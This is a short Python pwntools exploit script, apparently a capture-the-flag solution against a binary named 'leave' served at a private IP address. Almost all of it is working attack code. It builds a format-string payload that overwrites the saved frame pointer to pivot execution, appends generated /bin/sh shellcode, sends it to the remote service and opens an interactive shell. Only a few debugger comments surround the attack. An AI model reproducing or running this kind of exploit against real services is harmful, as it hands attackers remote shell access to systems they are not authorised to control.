#!/usr/bin/env python

from pwn import *
# break *0x08048533
# break *0x080485C0

p = process('./leave')
p = remote('192.168.231.140', 10001)

shellcode = shellcraft.sh()  #cat file
shellcode = asm(shellcode)

# context.terminal = ['gnome-terminal','-x','sh','-c']
# gdb.attach(proc.pidof(p)[0])


# eip= *(0x41414141)
#     esp=0x41414141, ebp=save_ebp
#         esp=vail_addr, ebp= 0x41414141
#             *ebp = 0x41414141, ebp=vail_addr



payload = '%{}x%4$np'.format(str(0x804a170))  # write ebp
payload += p32(0x804a16c)  #padding for pop
payload += p32(0x804a174)
payload += shellcode
p.sendline(payload)
print "recv: ",p.recv()
p.sendline("key")
p.interactive()